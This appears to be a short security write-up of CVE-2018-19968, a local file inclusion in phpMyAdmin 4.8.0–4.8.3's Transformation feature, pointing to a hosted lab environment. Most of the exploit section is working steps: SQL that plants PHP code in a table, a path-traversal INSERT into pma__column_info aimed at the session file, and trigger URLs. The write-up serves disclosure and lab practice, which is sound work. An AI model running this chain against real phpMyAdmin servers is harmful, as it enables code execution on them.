phpMyAdmin 4.8.0~4.8.3 Local File Inclusion in Transformation Feature (PMASA-2018-6/CVE-2018-19968)


On December 07, 2018, phpMyAdmin released a security bulletin PMASA-2018-6 to fix a local file reading vulnerability caused by the Transformation feature.

The transformation feature from PHPMyAdmin allows to have a specific display for some columns when selecting them from a table. For example, it can transform links in text format to clickable links when rendering them.

More about Transformations: Transformations - phpMyAdmin 5.0.0-dev documentation

VulnSpy's online phpMyAdmin 4.8.1 environment:https://www.vsplate.com/?github=vulnspy/phpmyadmin-4.8.1

VULNERABILITY DETAILS

PHPMyAdmin multiple vulnerabilities - Sec Team Blog

EXPLOIT

  1. Create a new database foo with a random bar table containing a baz column, with a data containing PHP code in it (to fill the session with some php code):
CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';

  1. Visit http://pma.vsplate.me/chk_rel.php?fixall_pmadb=1&db=foo to create phpmyadmin system tables in your db

  1. Fill the transformation information with the path traversal in the pma__column_info table:

Replace sess_*** to your sessionid (phpMyAdmin in cookies)

INSERT INTO `pma__column_info`SELECT '1', 'foo', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop',
'../../../../../../../../tmp/sess_***','plop';

  1. Visit http://pma.vsplate.me/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 to trigger the vulnerability.

REFERENCE

All rights reserved. © 2019 VULNSPY